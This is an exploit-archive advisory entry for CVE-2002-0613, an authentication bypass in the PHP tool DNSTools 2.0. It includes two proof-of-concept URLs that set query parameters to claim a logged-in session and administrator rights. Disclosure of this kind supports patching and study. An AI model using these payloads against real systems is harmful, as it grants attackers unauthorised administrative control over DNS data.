DNSTools 2.0 - Authentication Bypass

Author: ppp-design
type: webapps
platform: php
port: 
date_added: 2002-04-28  
date_updated: 2012-09-21  
verified: 1  
codes: CVE-2002-0613;OSVDB-5176  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21425.txt  

source: https://www.securityfocus.com/bid/4617/info

DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris.

A vulnerability has been reported in some versions of DNSTools which allows any remote attacker to gain administrative access. An artificially constructed URL may define variables used to track user authentication and administrative access.

http://www.example.com/dnstools.php?section=hosts&user_logged_in=true
http://www.example.com/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES